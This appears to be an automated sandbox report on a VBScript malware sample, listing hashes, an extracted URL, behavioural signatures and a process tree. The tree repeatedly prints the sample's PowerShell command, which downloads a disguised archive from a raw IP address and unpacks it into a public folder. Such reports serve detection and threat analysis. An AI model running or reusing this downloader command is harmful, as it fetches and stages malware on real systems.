Analysis
- max time kernel: 350s
- max time network: 705s
- platform: windows7_x64
- resource: win7-20240220-en
- resource tags: arch:x64, arch:x86, image:win7-20240220-en, locale:en-us, os:windows7-x64, system
- submitted: 12/03/2024, 14:32
- Static task: static1
- Behavioral task: behavioral1
- Sample: g4.vbs
- Resource: win7-20240220-en
General
- Target: g4.vbs
- Size: 731B
- MD5: f82736dcca9ccf1e8460707f48f51478
- SHA1: 2210fe31ae5e82413301a8e91bce03cf1eb14246
- SHA256: e2228f06454d5c8033bb22ad4a81bbc3997e318bf34372a57232b51e8360f4d8
- SHA512: 67c5be560f30f2299f91288215924fb96db32a73a2beab988f7cb38a721984ee0f8f986f43b2780c3574ad81ffbeb98b3d4112e9982f3e4ec2e80fde27014c5f
Malware Config
- Extracted: http://104.243.44.136:777/moh.jpg
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (chrome.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (chrome.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (chrome.exe)
-
Modifies Internet Explorer settings
Key created / Set value operations by iexplore.exe and IEXPLORE.EXE under the user's Software\Microsoft\Internet Explorer registry hive (Main, Recovery, LowRegistry, Zoom, Toolbar, MINIE, GPU and related subkeys).
-
Opens file in notepad (likely ransom note) 4 IoCs
- 2900 Notepad.exe
- 1372 NOTEPAD.EXE
- 2672 notepad.exe
- 2852 NOTEPAD.EXE
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
- 2920 powershell.exe
- 552 chrome.exe (4 events)
- 300 powershell.exe
- 2224 powershell.exe
- 320 powershell.exe
- 2636 powershell.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of FindShellTrayWindow 35 IoCs
Suspicious use of SendNotifyMessage 32 IoCs
Suspicious use of SetWindowsHookEx 4 IoCs
- 1772 iexplore.exe (2 events)
- 2452 IEXPLORE.EXE (2 events)
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\g4.vbs"
  - Suspicious use of WriteProcessMemory
  PID:2860
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID:2920
C:\Windows\explorer.exe
  Command line: "C:\Windows\explorer.exe"
  PID:2512
C:\Program Files\Internet Explorer\iexplore.exe
  Command line: "C:\Program Files\Internet Explorer\iexplore.exe" http://users/
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1772
    C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1772 CREDAT:275457 /prefetch:2
      - Modifies Internet Explorer settings
      - Suspicious use of SetWindowsHookEx
      PID:2452
C:\Program Files\Google\Chrome\Application\chrome.exe
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe"
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:552
    C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef4dd9758,0x7fef4dd9768,0x7fef4dd9778
      PID:1764
    C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1176 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:2
      PID:1672
    C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1512 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:8
      PID:812
    C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:8
      PID:1540
    C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2292 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
      PID:1460
    C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2300 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
      PID:1924
    C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1284 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:2
      PID:2756
    C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1448 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
      PID:2408
    C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3700 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:8
      PID:1912
    C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3720 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
      PID:816
    C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3184 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
      PID:2772
    C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3752 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
      PID:2876
    C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3888 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
      PID:2844
    C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3396 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
      PID:2312
    C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1880 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:8
      PID:1268
    C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=2508 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
      PID:2600
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
  Command line: "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
  PID:2204
C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"
  - Suspicious behavior: EnumeratesProcesses
  PID:300
C:\Windows\system32\NOTEPAD.EXE
  Command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\a.txt
  - Opens file in notepad (likely ransom note)
  PID:1372
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\Admin\Desktop\a.ps1"
  - Suspicious behavior: EnumeratesProcesses
  PID:2224
C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"
  - Suspicious behavior: EnumeratesProcesses
  PID:320
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Users\Admin\Desktop\a.ps1
      - Suspicious behavior: EnumeratesProcesses
      PID:2636
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass
      PID:912
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Users\Admin\Desktop\a.ps1
          PID:2512
C:\Windows\System32\notepad.exe
  Command line: "C:\Windows\System32\notepad.exe" "C:\Users\Admin\Desktop\a.ps1"
  - Opens file in notepad (likely ransom note)
  PID:2672
C:\Windows\system32\NOTEPAD.EXE
  Command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\aaa.txt
  - Opens file in notepad (likely ransom note)
  PID:2852
C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\aaa.vbs"
  PID:412
C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
  PID:2412
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
      PID:2192
C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
  PID:2260
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
      PID:1424
C:\Windows\explorer.exe
  Command line: "C:\Windows\explorer.exe"
  PID:2104
C:\Windows\system32\AUDIODG.EXE
  Command line: C:\Windows\system32\AUDIODG.EXE 0x4fc
  PID:2692
C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
  PID:1932
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
      PID:2392
C:\Windows\System32\CScript.exe
  Command line: "C:\Windows\System32\CScript.exe" "C:\Users\Admin\Desktop\a.vbs"
  PID:1976
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
      PID:1672
C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
  PID:2192
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
      PID:2884
C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
  PID:1808
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
      PID:2700
C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
  PID:2020
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
      PID:2620
C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\aaa.vbs"
  PID:1620
C:\Windows\System32\Notepad.exe
  Command line: "C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\a.vbs
  - Opens file in notepad (likely ransom note)
  PID:2900
C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
  PID:1752
C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
  PID:1872
Network
MITRE ATT&CK Enterprise v15
Downloads